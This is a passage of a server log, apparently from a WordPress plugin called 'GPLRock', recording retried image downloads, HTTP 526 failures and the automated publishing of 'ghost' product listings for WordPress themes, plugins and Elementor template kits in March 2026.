tokyo-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:41:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tokyo---personal-portfolio-wordpress-theme-32103.webp for product tokyo-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 17:41:58 UTC] GPLRock WARNING: Image download failed for product tokyo-personal-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/tokyo---personal-portfolio-wordpress-theme-32103.webp [09-Mar-2026 17:41:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tokyo-personal-portfolio-wordpress-theme [09-Mar-2026 17:41:58 UTC] GPLRock: Image download failed for product camping-village-campground-caravan-hiking-tent-accommodation-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:42:00 UTC] GPLRock: Image download failed for product camping-village-campground-caravan-hiking-tent-accommodation-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:42:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/camping-village---campground-caravan-hiking-tent-accommodation-wordpress-theme-4296.webp for product camping-village-campground-caravan-hiking-tent-accommodation-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 17:42:03 UTC] GPLRock: Image download failed for product camping-village-campground-caravan-hiking-tent-accommodation-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:42:05 UTC] GPLRock: Image download failed for product camping-village-campground-caravan-hiking-tent-accommodation-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:42:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/camping-village---campground-caravan-hiking-tent-accommodation-wordpress-theme-4296.webp for product camping-village-campground-caravan-hiking-tent-accommodation-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 17:42:07 UTC] GPLRock WARNING: Image download failed for product camping-village-campground-caravan-hiking-tent-accommodation-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/camping-village---campground-caravan-hiking-tent-accommodation-wordpress-theme-4296.webp [09-Mar-2026 17:42:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: camping-village-campground-caravan-hiking-tent-accommodation-wordpress-theme [09-Mar-2026 17:42:07 UTC] GPLRock: Image download failed for product framey-startup-saas-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:42:09 UTC] GPLRock: Image download failed for product framey-startup-saas-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:42:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/framey---startup--saas-wordpress-theme-32359.webp for product framey-startup-saas-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 17:42:12 UTC] GPLRock: Image download failed for product framey-startup-saas-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:42:14 UTC] GPLRock: Image download failed for product framey-startup-saas-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:42:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/framey---startup--saas-wordpress-theme-32359.webp for product framey-startup-saas-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 17:42:16 UTC] GPLRock WARNING: Image download failed for product framey-startup-saas-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/framey---startup--saas-wordpress-theme-32359.webp [09-Mar-2026 17:42:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: framey-startup-saas-wordpress-theme [09-Mar-2026 17:42:16 UTC] GPLRock: Image download failed for product micro-office-extranet-intranet-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:42:18 UTC] GPLRock: Image download failed for product micro-office-extranet-intranet-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:42:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/micro-office--extranet--intranet-wordpress-theme-7572.webp for product micro-office-extranet-intranet-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 17:42:21 UTC] GPLRock: Image download failed for product micro-office-extranet-intranet-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:42:23 UTC] GPLRock: Image download failed for product micro-office-extranet-intranet-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:42:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/micro-office--extranet--intranet-wordpress-theme-7572.webp for product micro-office-extranet-intranet-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 17:42:25 UTC] GPLRock WARNING: Image download failed for product micro-office-extranet-intranet-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/micro-office--extranet--intranet-wordpress-theme-7572.webp [09-Mar-2026 17:42:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: micro-office-extranet-intranet-wordpress-theme [09-Mar-2026 17:42:25 UTC] GPLRock: Image download failed for product codo-minimalist-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:42:27 UTC] GPLRock: Image download failed for product codo-minimalist-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:42:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/codo---minimalist-woocommerce-theme-11147.webp for product codo-minimalist-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 17:42:30 UTC] GPLRock: Image download failed for product codo-minimalist-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:42:32 UTC] GPLRock: Image download failed for product codo-minimalist-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [09-Mar-2026 17:42:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/codo---minimalist-woocommerce-theme-11147.webp for product codo-minimalist-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [09-Mar-2026 17:42:34 UTC] GPLRock WARNING: Image download failed for product codo-minimalist-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/codo---minimalist-woocommerce-theme-11147.webp [09-Mar-2026 17:42:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: codo-minimalist-woocommerce-theme [09-Mar-2026 17:42:40 UTC] GPLRock: Image downloaded successfully for product oganic-organic-food-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-809f494c.webp [09-Mar-2026 17:42:40 UTC] GPLRock: Using pre-downloaded image for product oganic-organic-food-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-809f494c.webp [09-Mar-2026 17:42:40 UTC] GPLRock: Ghost product published with image - Product ID: oganic-organic-food-elementor-template-kit [09-Mar-2026 17:42:41 UTC] GPLRock: Image downloaded successfully for product odette-restaurant-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f26baf87.webp [09-Mar-2026 17:42:41 UTC] GPLRock: Using pre-downloaded image for product odette-restaurant-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f26baf87.webp [09-Mar-2026 17:42:41 UTC] GPLRock: Ghost product published with image - Product ID: odette-restaurant-elementor-template-kit [09-Mar-2026 17:42:42 UTC] GPLRock: Image downloaded successfully for product ochiz-photography-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-92c9f6c9.webp [09-Mar-2026 17:42:42 UTC] GPLRock: Using pre-downloaded image for product ochiz-photography-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-92c9f6c9.webp [09-Mar-2026 17:42:42 UTC] GPLRock: Ghost product published with image - Product ID: ochiz-photography-portfolio-elementor-template-kit [09-Mar-2026 17:42:43 UTC] GPLRock: Image downloaded successfully for product obe-house-cleaning-business-elementor-template-kits (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c33f4e34.webp [09-Mar-2026 17:42:44 UTC] GPLRock: Using pre-downloaded image for product obe-house-cleaning-business-elementor-template-kits: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c33f4e34.webp [09-Mar-2026 17:42:44 UTC] GPLRock: Ghost product published with image - Product ID: obe-house-cleaning-business-elementor-template-kits [09-Mar-2026 17:42:45 UTC] GPLRock: Image downloaded successfully for product nvic-blog-magazine-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0b68eba5.webp [09-Mar-2026 17:42:45 UTC] GPLRock: Using pre-downloaded image for product nvic-blog-magazine-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0b68eba5.webp [09-Mar-2026 17:42:45 UTC] GPLRock: Ghost product published with image - Product ID: nvic-blog-magazine-elementor-template-kit [09-Mar-2026 17:42:46 UTC] GPLRock: Image downloaded successfully for product nutritist-healthy-food-nutrition-coach-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e7b13367.jpg [09-Mar-2026 17:42:46 UTC] GPLRock: Using pre-downloaded image for product nutritist-healthy-food-nutrition-coach-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e7b13367.jpg [09-Mar-2026 17:42:46 UTC] GPLRock: Ghost product published with image - Product ID: nutritist-healthy-food-nutrition-coach-elementor-template-kit [09-Mar-2026 17:42:47 UTC] GPLRock: Image downloaded successfully for product nusapp-saas-startup-business-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ed33ce42.webp [09-Mar-2026 17:42:48 UTC] GPLRock: Using pre-downloaded image for product nusapp-saas-startup-business-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ed33ce42.webp [09-Mar-2026 17:42:48 UTC] GPLRock: Ghost product published with image - Product ID: nusapp-saas-startup-business-elementor-template-kit [09-Mar-2026 17:42:49 UTC] GPLRock: Image downloaded successfully for product nusafe-charity-non-profit-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1b32fffa.webp [09-Mar-2026 17:42:50 UTC] GPLRock: Using pre-downloaded image for product nusafe-charity-non-profit-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1b32fffa.webp [09-Mar-2026 17:42:50 UTC] GPLRock: Ghost product published with image - Product ID: nusafe-charity-non-profit-elementor-template-kit [09-Mar-2026 17:42:51 UTC] GPLRock: Image downloaded successfully for product nunis-kindergarten-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d0356733.webp [09-Mar-2026 17:42:51 UTC] GPLRock: Using pre-downloaded image for product nunis-kindergarten-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d0356733.webp [09-Mar-2026 17:42:51 UTC] GPLRock: Ghost product published with image - Product ID: nunis-kindergarten-elementor-template-kit [09-Mar-2026 17:42:52 UTC] GPLRock: Image downloaded successfully for product nufti-nft-collections-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dc69333c.webp [09-Mar-2026 17:42:53 UTC] GPLRock: Using pre-downloaded image for product nufti-nft-collections-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dc69333c.webp [09-Mar-2026 17:42:53 UTC] GPLRock: Ghost product published with image - Product ID: nufti-nft-collections-elementor-template-kit [09-Mar-2026 17:44:19 UTC] GPLRock: Image downloaded successfully for product groups-file-access (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-15a75f8f.jpg [09-Mar-2026 17:44:19 UTC] GPLRock: Using pre-downloaded image for product groups-file-access: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-15a75f8f.jpg [09-Mar-2026 17:44:19 UTC] GPLRock: Ghost product published with image - Product ID: groups-file-access [09-Mar-2026 17:44:21 UTC] GPLRock: Image downloaded successfully for product elmastudio-weta-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-271a8246.jpg [09-Mar-2026 17:44:22 UTC] GPLRock: Using pre-downloaded image for product elmastudio-weta-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-271a8246.jpg [09-Mar-2026 17:44:22 UTC] GPLRock: Ghost product published with image - Product ID: elmastudio-weta-wordpress-theme [09-Mar-2026 17:44:25 UTC] GPLRock: Image downloaded successfully for product ultimate-member-instagram (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3da8416c.jpg [09-Mar-2026 17:44:25 UTC] GPLRock: Using pre-downloaded image for product ultimate-member-instagram: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3da8416c.jpg [09-Mar-2026 17:44:25 UTC] GPLRock: Ghost product published with image - Product ID: ultimate-member-instagram [09-Mar-2026 17:44:26 UTC] GPLRock: Image downloaded successfully for product searchwp-custom-results-order (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-781bdbf3.jpg [09-Mar-2026 17:44:27 UTC] GPLRock: Using pre-downloaded image for product searchwp-custom-results-order: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-781bdbf3.jpg [09-Mar-2026 17:44:27 UTC] GPLRock: Ghost product published with image - Product ID: searchwp-custom-results-order [09-Mar-2026 17:44:29 UTC] GPLRock: Image downloaded successfully for product quform-wordpress-form-builder (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-026972ad.jpg [09-Mar-2026 17:44:29 UTC] GPLRock: Using pre-downloaded image for product quform-wordpress-form-builder: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-026972ad.jpg [09-Mar-2026 17:44:29 UTC] GPLRock: Ghost product published with image - Product ID: quform-wordpress-form-builder [09-Mar-2026 17:44:30 UTC] GPLRock: Image downloaded successfully for product wp-rich-snippets-anonymous-user-reviews (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e5756d72.jpg [09-Mar-2026 17:44:31 UTC] GPLRock: Using pre-downloaded image for product wp-rich-snippets-anonymous-user-reviews: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e5756d72.jpg [09-Mar-2026 17:44:31 UTC] GPLRock: Ghost product published with image - Product ID: wp-rich-snippets-anonymous-user-reviews [09-Mar-2026 17:44:32 UTC] GPLRock: Image downloaded successfully for product restrict-content-pro-ip-restriction (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-426afcdd.jpg [09-Mar-2026 17:44:33 UTC] GPLRock: Using pre-downloaded image for product restrict-content-pro-ip-restriction: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-426afcdd.jpg [09-Mar-2026 17:44:33 UTC] GPLRock: Ghost product published with image - Product ID: restrict-content-pro-ip-restriction [09-Mar-2026 17:44:34 UTC] GPLRock: Image downloaded successfully for product css-igniter-el-greco-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-479418a9.jpg [09-Mar-2026 17:44:34 UTC] GPLRock: Using pre-downloaded image for product css-igniter-el-greco-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-479418a9.jpg [09-Mar-2026 17:44:34 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-el-greco-wordpress-theme [09-Mar-2026 17:44:35 UTC] GPLRock: Image downloaded successfully for product ninja-forms-secure-form (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-676ab391.jpg [09-Mar-2026 17:44:35 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-secure-form: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-676ab391.jpg [09-Mar-2026 17:44:35 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-secure-form [09-Mar-2026 17:44:37 UTC] GPLRock: Image downloaded successfully for product wpfomify-woocommerce-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-617d922e.jpg [09-Mar-2026 17:44:37 UTC] GPLRock: Using pre-downloaded image for product wpfomify-woocommerce-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-617d922e.jpg [09-Mar-2026 17:44:37 UTC] GPLRock: Ghost product published with image - Product ID: wpfomify-woocommerce-addon [09-Mar-2026 17:52:53 UTC] GPLRock: Image downloaded successfully for product porka-digital-marketing-personal-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d3c0587a.webp [09-Mar-2026 17:52:53 UTC] GPLRock: Using pre-downloaded image for product porka-digital-marketing-personal-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d3c0587a.webp [09-Mar-2026 17:52:54 UTC] GPLRock: Ghost product published with image - Product ID: porka-digital-marketing-personal-portfolio-elementor-template-kit [09-Mar-2026 17:52:55 UTC] GPLRock: Image downloaded successfully for product populi-politician-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b698b375.webp [09-Mar-2026 17:52:56 UTC] GPLRock: Using pre-downloaded image for product populi-politician-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b698b375.webp [09-Mar-2026 17:52:56 UTC] GPLRock: Ghost product published with image - Product ID: populi-politician-elementor-template-kit [09-Mar-2026 17:52:57 UTC] GPLRock: Image downloaded successfully for product poppy-blog-magazine-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5db35006.webp [09-Mar-2026 17:52:57 UTC] GPLRock: Using pre-downloaded image for product poppy-blog-magazine-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5db35006.webp [09-Mar-2026 17:52:57 UTC] GPLRock: Ghost product published with image - Product ID: poppy-blog-magazine-elementor-template-kit [09-Mar-2026 17:52:58 UTC] GPLRock: Image downloaded successfully for product poolcare-swimming-pool-service-maintenance-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f9998493.webp [09-Mar-2026 17:52:58 UTC] GPLRock: Using pre-downloaded image for product poolcare-swimming-pool-service-maintenance-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f9998493.webp [09-Mar-2026 17:52:58 UTC] GPLRock: Ghost product published with image - Product ID: poolcare-swimming-pool-service-maintenance-elementor-template-kit [09-Mar-2026 17:52:59 UTC] GPLRock: Image downloaded successfully for product politics-political-candidate-leader-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8c9bd2ed.webp [09-Mar-2026 17:52:59 UTC] GPLRock: Using pre-downloaded image for product politics-political-candidate-leader-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8c9bd2ed.webp [09-Mar-2026 17:52:59 UTC] GPLRock: Ghost product published with image - Product ID: politics-political-candidate-leader-elementor-template-kit [09-Mar-2026 17:53:00 UTC] GPLRock: Image downloaded successfully for product podzed-podcaster-radio-station-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e4b858c8.jpg [09-Mar-2026 17:53:00 UTC] GPLRock: Using pre-downloaded image for product podzed-podcaster-radio-station-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e4b858c8.jpg [09-Mar-2026 17:53:00 UTC] GPLRock: Ghost product published with image - Product ID: podzed-podcaster-radio-station-elementor-template-kit [09-Mar-2026 17:53:01 UTC] GPLRock: Image downloaded successfully for product plumbr-plumbing-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7d7137c6.jpg [09-Mar-2026 17:53:01 UTC] GPLRock: Using pre-downloaded image for product plumbr-plumbing-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7d7137c6.jpg [09-Mar-2026 17:53:02 UTC] GPLRock: Ghost product published with image - Product ID: plumbr-plumbing-services-elementor-template-kit [09-Mar-2026 17:53:03 UTC] GPLRock: Image downloaded successfully for product plumberon-plumbing-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b922a7d2.webp [09-Mar-2026 17:53:03 UTC] GPLRock: Using pre-downloaded image for product plumberon-plumbing-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b922a7d2.webp [09-Mar-2026 17:53:03 UTC] GPLRock: Ghost product published with image - Product ID: plumberon-plumbing-service-elementor-template-kit [09-Mar-2026 17:53:04 UTC] GPLRock: Image downloaded successfully for product pleshost-cloud-web-hosting-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-afcb720a.webp [09-Mar-2026 17:53:05 UTC] GPLRock: Using pre-downloaded image for product pleshost-cloud-web-hosting-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-afcb720a.webp [09-Mar-2026 17:53:05 UTC] GPLRock: Ghost product published with image - Product ID: pleshost-cloud-web-hosting-elementor-template-kit [09-Mar-2026 17:53:06 UTC] GPLRock: Image downloaded successfully for product playkits-video-game-publisher-shop-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-91f2c8d3.webp [09-Mar-2026 17:53:06 UTC] GPLRock: Using pre-downloaded image for product playkits-video-game-publisher-shop-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-91f2c8d3.webp [09-Mar-2026 17:53:06 UTC] GPLRock: Ghost product published with image - Product ID: playkits-video-game-publisher-shop-elementor-template-kit [09-Mar-2026 18:02:28 UTC] GPLRock: Image downloaded successfully for product wpmu-dev-google-analytics-plus (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cb11a43f.png [09-Mar-2026 18:02:28 UTC] GPLRock: Using pre-downloaded image for product wpmu-dev-google-analytics-plus: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cb11a43f.png [09-Mar-2026 18:02:28 UTC] GPLRock: Ghost product published with image - Product ID: wpmu-dev-google-analytics-plus [09-Mar-2026 18:02:28 UTC] GPLRock: Image downloaded successfully for product izooto-for-amp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-75ef19cd.png [09-Mar-2026 18:02:29 UTC] GPLRock: Image downloaded successfully for product doctreat-doctors-directory-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2ef0d0b4.jpg [09-Mar-2026 18:02:29 UTC] GPLRock: Using pre-downloaded image for product izooto-for-amp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-75ef19cd.png [09-Mar-2026 18:02:29 UTC] GPLRock: Using pre-downloaded image for product doctreat-doctors-directory-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2ef0d0b4.jpg [09-Mar-2026 18:02:29 UTC] GPLRock: Ghost product published with image - Product ID: izooto-for-amp [09-Mar-2026 18:02:29 UTC] GPLRock: Ghost product published with image - Product ID: doctreat-doctors-directory-wordpress-theme [09-Mar-2026 18:02:29 UTC] GPLRock: Image downloaded successfully for product soflyy-wp-all-export-user-add-on-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c922c8f2.jpg [09-Mar-2026 18:02:29 UTC] GPLRock: Image downloaded successfully for product plan-my-day-wedding-event-planning-agency (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c84932a9.png [09-Mar-2026 18:02:29 UTC] GPLRock: Using pre-downloaded image for product soflyy-wp-all-export-user-add-on-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c922c8f2.jpg [09-Mar-2026 18:02:29 UTC] GPLRock: Using pre-downloaded image for product plan-my-day-wedding-event-planning-agency: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c84932a9.png [09-Mar-2026 18:02:29 UTC] GPLRock: Ghost product published with image - Product ID: soflyy-wp-all-export-user-add-on-pro [09-Mar-2026 18:02:29 UTC] GPLRock: Ghost product published with image - Product ID: plan-my-day-wedding-event-planning-agency [09-Mar-2026 18:02:30 UTC] GPLRock: Image downloaded successfully for product classipress-theme-compatibility-for-amp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4338a5b1.png [09-Mar-2026 18:02:30 UTC] GPLRock: Using pre-downloaded image for product classipress-theme-compatibility-for-amp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4338a5b1.png [09-Mar-2026 18:02:30 UTC] GPLRock: Ghost product published with image - Product ID: classipress-theme-compatibility-for-amp [09-Mar-2026 18:02:30 UTC] GPLRock: Image downloaded successfully for product searchwp-shortcodes (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f78c017e.jpg [09-Mar-2026 18:02:30 UTC] GPLRock: Using pre-downloaded image for product searchwp-shortcodes: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f78c017e.jpg [09-Mar-2026 18:02:30 UTC] GPLRock: Image downloaded successfully for product greenmart-organic-food-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f7b3f139.jpg [09-Mar-2026 18:02:30 UTC] GPLRock: Using pre-downloaded image for product greenmart-organic-food-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f7b3f139.jpg [09-Mar-2026 18:02:30 UTC] GPLRock: Ghost product published with image - Product ID: greenmart-organic-food-woocommerce-wordpress-theme [09-Mar-2026 18:02:30 UTC] GPLRock: Ghost product published with image - Product ID: searchwp-shortcodes [09-Mar-2026 18:02:30 UTC] GPLRock: Image downloaded successfully for product cars4rent-car-rental-taxi-service-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-897d0904.jpg [09-Mar-2026 18:02:30 UTC] GPLRock: Using pre-downloaded image for product cars4rent-car-rental-taxi-service-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-897d0904.jpg [09-Mar-2026 18:02:30 UTC] GPLRock: Ghost product published with image - Product ID: cars4rent-car-rental-taxi-service-wordpress-theme [09-Mar-2026 18:02:31 UTC] GPLRock: Image downloaded successfully for product floating-button-for-amp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3893fe9e.png [09-Mar-2026 18:02:31 UTC] GPLRock: Using pre-downloaded image for product floating-button-for-amp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3893fe9e.png [09-Mar-2026 18:02:31 UTC] GPLRock: Ghost product published with image - Product ID: floating-button-for-amp [09-Mar-2026 18:02:31 UTC] GPLRock: Image downloaded successfully for product envira-gallery-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b43771f5.jpg [09-Mar-2026 18:02:31 UTC] GPLRock: Using pre-downloaded image for product envira-gallery-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b43771f5.jpg [09-Mar-2026 18:02:31 UTC] GPLRock: Ghost product published with image - Product ID: 